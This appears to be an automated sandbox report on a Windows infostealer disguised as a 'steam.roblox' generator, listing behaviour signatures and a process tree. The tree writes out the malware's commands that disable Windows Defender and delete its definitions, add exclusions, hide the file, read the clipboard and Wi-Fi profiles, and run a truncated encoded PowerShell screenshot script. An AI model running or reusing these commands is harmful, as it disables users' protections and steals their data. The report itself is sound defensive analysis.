Analysis
-
max time kernel
101s -
max time network
143s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
28-11-2024 19:25
Behavioral task
behavioral1
Sample
gen steam.roblox/gen-(1).exe
Resource
win10ltsc2021-20241023-en
General
-
Target
gen steam.roblox/gen-(1).exe
-
Size
7.4MB
-
MD5
ccf3d3e9e629990d4dcfa3fec7f3ec1e
-
SHA1
479f853bf161ddff64a044b486d70e96654c923e
-
SHA256
f332235072e8ab37ec7c472f04e1d919be8a841cdc7bc3c3a19f1deb0ad2d700
-
SHA512
83a0458a3ebbf70b26e2e3324c836cc2b82748b2a17e195334b4a31a43ee0c35a288eb2e375cf440564ad9ba78f9d908ff178290354207a004ee98899776863d
-
SSDEEP
98304:wGSi8TR8WnurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EwKhOh112mY:wBcgurErvI9pWjgfPvzm6gsFEF4fC
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 3872 MpCmdRun.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1536 powershell.exe 2188 powershell.exe 2020 powershell.exe 2140 powershell.exe 3864 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exegen-(1).exeattrib.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts gen-(1).exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 3600 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
gen-(1).exepid Process 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe 2952 gen-(1).exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 ip-api.com 22 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid Process 2764 tasklist.exe 3844 tasklist.exe 3536 tasklist.exe 3064 tasklist.exe 3416 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule behavioral1/files/0x002900000004519a-21.dat upx behavioral1/memory/2952-25-0x00007FFF27400000-0x00007FFF279F2000-memory.dmp upx behavioral1/files/0x003400000004517a-28.dat upx behavioral1/files/0x0029000000045194-48.dat upx behavioral1/files/0x0026000000045193-47.dat upx behavioral1/files/0x0026000000045192-46.dat upx behavioral1/files/0x0026000000045191-45.dat upx behavioral1/files/0x0026000000045190-44.dat upx behavioral1/files/0x0026000000045184-43.dat upx behavioral1/files/0x0026000000045180-42.dat upx behavioral1/files/0x002c000000045179-41.dat upx behavioral1/files/0x00280000000451a8-40.dat upx behavioral1/files/0x00280000000451a7-39.dat upx behavioral1/files/0x00280000000451a6-38.dat upx behavioral1/files/0x0029000000045199-35.dat upx behavioral1/files/0x0029000000045197-34.dat upx behavioral1/memory/2952-32-0x00007FFF3FFC0000-0x00007FFF3FFCF000-memory.dmp upx behavioral1/files/0x0029000000045198-31.dat upx behavioral1/memory/2952-30-0x00007FFF36A10000-0x00007FFF36A34000-memory.dmp upx behavioral1/memory/2952-54-0x00007FFF367A0000-0x00007FFF367CD000-memory.dmp upx behavioral1/memory/2952-56-0x00007FFF3C710000-0x00007FFF3C729000-memory.dmp upx behavioral1/memory/2952-58-0x00007FFF36770000-0x00007FFF36793000-memory.dmp upx behavioral1/memory/2952-60-0x00007FFF359C0000-0x00007FFF35B3E000-memory.dmp upx behavioral1/memory/2952-64-0x00007FFF36760000-0x00007FFF3676D000-memory.dmp upx behavioral1/memory/2952-62-0x00007FFF365C0000-0x00007FFF365D9000-memory.dmp upx behavioral1/memory/2952-66-0x00007FFF36450000-0x00007FFF36483000-memory.dmp upx behavioral1/memory/2952-71-0x00007FFF358F0000-0x00007FFF359BD000-memory.dmp upx behavioral1/memory/2952-74-0x00007FFF36A10000-0x00007FFF36A34000-memory.dmp upx behavioral1/memory/2952-73-0x00007FFF26ED0000-0x00007FFF273F9000-memory.dmp upx behavioral1/memory/2952-70-0x00007FFF27400000-0x00007FFF279F2000-memory.dmp upx behavioral1/memory/2952-76-0x00007FFF363C0000-0x00007FFF363D4000-memory.dmp upx behavioral1/memory/2952-79-0x00007FFF36380000-0x00007FFF3638D000-memory.dmp upx behavioral1/memory/2952-78-0x00007FFF367A0000-0x00007FFF367CD000-memory.dmp upx behavioral1/memory/2952-82-0x00007FFF26B90000-0x00007FFF26CAC000-memory.dmp upx behavioral1/memory/2952-81-0x00007FFF3C710000-0x00007FFF3C729000-memory.dmp upx behavioral1/memory/2952-103-0x00007FFF36770000-0x00007FFF36793000-memory.dmp upx behavioral1/memory/2952-113-0x00007FFF359C0000-0x00007FFF35B3E000-memory.dmp upx behavioral1/memory/2952-217-0x00007FFF365C0000-0x00007FFF365D9000-memory.dmp upx behavioral1/memory/2952-315-0x00007FFF36450000-0x00007FFF36483000-memory.dmp upx behavioral1/memory/2952-316-0x00007FFF358F0000-0x00007FFF359BD000-memory.dmp upx behavioral1/memory/2952-333-0x00007FFF26ED0000-0x00007FFF273F9000-memory.dmp upx behavioral1/memory/2952-335-0x00007FFF363C0000-0x00007FFF363D4000-memory.dmp upx behavioral1/memory/2952-362-0x00007FFF359C0000-0x00007FFF35B3E000-memory.dmp upx behavioral1/memory/2952-357-0x00007FFF36A10000-0x00007FFF36A34000-memory.dmp upx behavioral1/memory/2952-356-0x00007FFF27400000-0x00007FFF279F2000-memory.dmp upx behavioral1/memory/2952-371-0x00007FFF27400000-0x00007FFF279F2000-memory.dmp upx behavioral1/memory/2952-386-0x00007FFF27400000-0x00007FFF279F2000-memory.dmp upx behavioral1/memory/2952-400-0x00007FFF26B90000-0x00007FFF26CAC000-memory.dmp upx behavioral1/memory/2952-399-0x00007FFF36380000-0x00007FFF3638D000-memory.dmp upx behavioral1/memory/2952-398-0x00007FFF363C0000-0x00007FFF363D4000-memory.dmp upx behavioral1/memory/2952-411-0x00007FFF358F0000-0x00007FFF359BD000-memory.dmp upx behavioral1/memory/2952-410-0x00007FFF36450000-0x00007FFF36483000-memory.dmp upx behavioral1/memory/2952-409-0x00007FFF36760000-0x00007FFF3676D000-memory.dmp upx behavioral1/memory/2952-408-0x00007FFF365C0000-0x00007FFF365D9000-memory.dmp upx behavioral1/memory/2952-407-0x00007FFF359C0000-0x00007FFF35B3E000-memory.dmp upx behavioral1/memory/2952-406-0x00007FFF36770000-0x00007FFF36793000-memory.dmp upx behavioral1/memory/2952-405-0x00007FFF3C710000-0x00007FFF3C729000-memory.dmp upx behavioral1/memory/2952-404-0x00007FFF367A0000-0x00007FFF367CD000-memory.dmp upx behavioral1/memory/2952-403-0x00007FFF3FFC0000-0x00007FFF3FFCF000-memory.dmp upx behavioral1/memory/2952-402-0x00007FFF36A10000-0x00007FFF36A34000-memory.dmp upx behavioral1/memory/2952-401-0x00007FFF26ED0000-0x00007FFF273F9000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEcmd.exepid Process 3520 PING.EXE 1512 cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid Process 1112 WMIC.exe 3100 WMIC.exe 3296 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 53 IoCs
Processes:
WMIC.exepowershell.exepowershell.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exepid Process 1680 WMIC.exe 1680 WMIC.exe 1680 WMIC.exe 1680 WMIC.exe 2188 powershell.exe 2188 powershell.exe 2140 powershell.exe 2140 powershell.exe 1112 WMIC.exe 1112 WMIC.exe 1112 WMIC.exe 1112 WMIC.exe 3100 WMIC.exe 3100 WMIC.exe 3100 WMIC.exe 3100 WMIC.exe 3864 powershell.exe 3864 powershell.exe 1196 WMIC.exe 1196 WMIC.exe 1196 WMIC.exe 1196 WMIC.exe 3160 powershell.exe 3160 powershell.exe 2172 powershell.exe 2172 powershell.exe 3160 powershell.exe 2172 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe 544 powershell.exe 544 powershell.exe 224 WMIC.exe 224 WMIC.exe 224 WMIC.exe 224 WMIC.exe 3704 WMIC.exe 3704 WMIC.exe 3704 WMIC.exe 3704 WMIC.exe 2660 WMIC.exe 2660 WMIC.exe 2660 WMIC.exe 2660 WMIC.exe 1536 powershell.exe 1536 powershell.exe 3296 WMIC.exe 3296 WMIC.exe 3296 WMIC.exe 3296 WMIC.exe 2024 powershell.exe 2024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetasklist.exeWMIC.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 3844 tasklist.exe Token: SeIncreaseQuotaPrivilege 1680 WMIC.exe Token: SeSecurityPrivilege 1680 WMIC.exe Token: SeTakeOwnershipPrivilege 1680 WMIC.exe Token: SeLoadDriverPrivilege 1680 WMIC.exe Token: SeSystemProfilePrivilege 1680 WMIC.exe Token: SeSystemtimePrivilege 1680 WMIC.exe Token: SeProfSingleProcessPrivilege 1680 WMIC.exe Token: SeIncBasePriorityPrivilege 1680 WMIC.exe Token: SeCreatePagefilePrivilege 1680 WMIC.exe Token: SeBackupPrivilege 1680 WMIC.exe Token: SeRestorePrivilege 1680 WMIC.exe Token: SeShutdownPrivilege 1680 WMIC.exe Token: SeDebugPrivilege 1680 WMIC.exe Token: SeSystemEnvironmentPrivilege 1680 WMIC.exe Token: SeRemoteShutdownPrivilege 1680 WMIC.exe Token: SeUndockPrivilege 1680 WMIC.exe Token: SeManageVolumePrivilege 1680 WMIC.exe Token: 33 1680 WMIC.exe Token: 34 1680 WMIC.exe Token: 35 1680 WMIC.exe Token: 36 1680 WMIC.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeIncreaseQuotaPrivilege 1680 WMIC.exe Token: SeSecurityPrivilege 1680 WMIC.exe Token: SeTakeOwnershipPrivilege 1680 WMIC.exe Token: SeLoadDriverPrivilege 1680 WMIC.exe Token: SeSystemProfilePrivilege 1680 WMIC.exe Token: SeSystemtimePrivilege 1680 WMIC.exe Token: SeProfSingleProcessPrivilege 1680 WMIC.exe Token: SeIncBasePriorityPrivilege 1680 WMIC.exe Token: SeCreatePagefilePrivilege 1680 WMIC.exe Token: SeBackupPrivilege 1680 WMIC.exe Token: SeRestorePrivilege 1680 WMIC.exe Token: SeShutdownPrivilege 1680 WMIC.exe Token: SeDebugPrivilege 1680 WMIC.exe Token: SeSystemEnvironmentPrivilege 1680 WMIC.exe Token: SeRemoteShutdownPrivilege 1680 WMIC.exe Token: SeUndockPrivilege 1680 WMIC.exe Token: SeManageVolumePrivilege 1680 WMIC.exe Token: 33 1680 WMIC.exe Token: 34 1680 WMIC.exe Token: 35 1680 WMIC.exe Token: 36 1680 WMIC.exe Token: SeIncreaseQuotaPrivilege 2188 powershell.exe Token: SeSecurityPrivilege 2188 powershell.exe Token: SeTakeOwnershipPrivilege 2188 powershell.exe Token: SeLoadDriverPrivilege 2188 powershell.exe Token: SeSystemProfilePrivilege 2188 powershell.exe Token: SeSystemtimePrivilege 2188 powershell.exe Token: SeProfSingleProcessPrivilege 2188 powershell.exe Token: SeIncBasePriorityPrivilege 2188 powershell.exe Token: SeCreatePagefilePrivilege 2188 powershell.exe Token: SeBackupPrivilege 2188 powershell.exe Token: SeRestorePrivilege 2188 powershell.exe Token: SeShutdownPrivilege 2188 powershell.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeSystemEnvironmentPrivilege 2188 powershell.exe Token: SeRemoteShutdownPrivilege 2188 powershell.exe Token: SeUndockPrivilege 2188 powershell.exe Token: SeManageVolumePrivilege 2188 powershell.exe Token: 33 2188 powershell.exe Token: 34 2188 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
gen-(1).exegen-(1).execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 4760 wrote to memory of 2952 4760 gen-(1).exe 80 PID 4760 wrote to memory of 2952 4760 gen-(1).exe 80 PID 2952 wrote to memory of 4000 2952 gen-(1).exe 81 PID 2952 wrote to memory of 4000 2952 gen-(1).exe 81 PID 2952 wrote to memory of 4284 2952 gen-(1).exe 82 PID 2952 wrote to memory of 4284 2952 gen-(1).exe 82 PID 2952 wrote to memory of 700 2952 gen-(1).exe 83 PID 2952 wrote to memory of 700 2952 gen-(1).exe 83 PID 2952 wrote to memory of 1032 2952 gen-(1).exe 86 PID 2952 wrote to memory of 1032 2952 gen-(1).exe 86 PID 2952 wrote to memory of 4832 2952 gen-(1).exe 89 PID 2952 wrote to memory of 4832 2952 gen-(1).exe 89 PID 700 wrote to memory of 1220 700 cmd.exe 91 PID 700 wrote to memory of 1220 700 cmd.exe 91 PID 4284 wrote to memory of 2188 4284 cmd.exe 92 PID 4284 wrote to memory of 2188 4284 cmd.exe 92 PID 1032 wrote to memory of 3844 1032 cmd.exe 93 PID 1032 wrote to memory of 3844 1032 cmd.exe 93 PID 4832 wrote to memory of 1680 4832 cmd.exe 94 PID 4832 wrote to memory of 1680 4832 cmd.exe 94 PID 4000 wrote to memory of 2140 4000 cmd.exe 95 PID 4000 wrote to memory of 2140 4000 cmd.exe 95 PID 2952 wrote to memory of 1796 2952 gen-(1).exe 98 PID 2952 wrote to memory of 1796 2952 gen-(1).exe 98 PID 1796 wrote to memory of 4840 1796 cmd.exe 173 PID 1796 wrote to memory of 4840 1796 cmd.exe 173 PID 4284 wrote to memory of 3872 4284 cmd.exe 101 PID 4284 wrote to memory of 3872 4284 cmd.exe 101 PID 2952 wrote to memory of 3268 2952 gen-(1).exe 102 PID 2952 wrote to memory of 3268 2952 gen-(1).exe 102 PID 3268 wrote to memory of 2544 3268 cmd.exe 104 PID 3268 wrote to memory of 2544 3268 cmd.exe 104 PID 2952 wrote to memory of 1804 2952 gen-(1).exe 170 PID 2952 wrote to memory of 1804 2952 gen-(1).exe 170 PID 1804 wrote to memory of 1112 1804 cmd.exe 107 PID 1804 wrote to memory of 1112 1804 cmd.exe 107 PID 2952 wrote to memory of 1316 2952 gen-(1).exe 108 PID 2952 wrote to memory of 1316 2952 gen-(1).exe 108 PID 1316 wrote to memory of 3100 1316 cmd.exe 110 PID 1316 wrote to memory of 3100 1316 cmd.exe 110 PID 2952 wrote to memory of 1408 2952 gen-(1).exe 111 PID 2952 wrote to memory of 1408 2952 gen-(1).exe 111 PID 2952 wrote to memory of 956 2952 gen-(1).exe 112 PID 2952 wrote to memory of 956 2952 gen-(1).exe 112 PID 1408 wrote to memory of 4088 1408 cmd.exe 115 PID 1408 wrote to memory of 4088 1408 cmd.exe 115 PID 956 wrote to memory of 3864 956 cmd.exe 116 PID 956 wrote to memory of 3864 956 cmd.exe 116 PID 2952 wrote to memory of 4592 2952 gen-(1).exe 117 PID 2952 wrote to memory of 4592 2952 gen-(1).exe 117 PID 2952 wrote to memory of 3820 2952 gen-(1).exe 118 PID 2952 wrote to memory of 3820 2952 gen-(1).exe 118 PID 2952 wrote to memory of 4416 2952 gen-(1).exe 121 PID 2952 wrote to memory of 4416 2952 gen-(1).exe 121 PID 3820 wrote to memory of 3536 3820 cmd.exe 122 PID 3820 wrote to memory of 3536 3820 cmd.exe 122 PID 2952 wrote to memory of 4328 2952 gen-(1).exe 124 PID 2952 wrote to memory of 4328 2952 gen-(1).exe 124 PID 2952 wrote to memory of 1620 2952 gen-(1).exe 126 PID 2952 wrote to memory of 1620 2952 gen-(1).exe 126 PID 4592 wrote to memory of 3064 4592 cmd.exe 128 PID 4592 wrote to memory of 3064 4592 cmd.exe 128 PID 2952 wrote to memory of 4412 2952 gen-(1).exe 129 PID 2952 wrote to memory of 4412 2952 gen-(1).exe 129 -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid Process 4088 attrib.exe 3552 attrib.exe 4928 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:3872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please dm the owner or join in the server.', 0, 'the generator license not working, or dont updated | sorry |', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please dm the owner or join in the server.', 0, 'the generator license not working, or dont updated | sorry |', 0+16);close()"4⤵PID:1220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:2544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"4⤵
- Views/modifies file attributes
PID:4088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:4416
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1620
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4412
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3632 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2428
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:4296
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA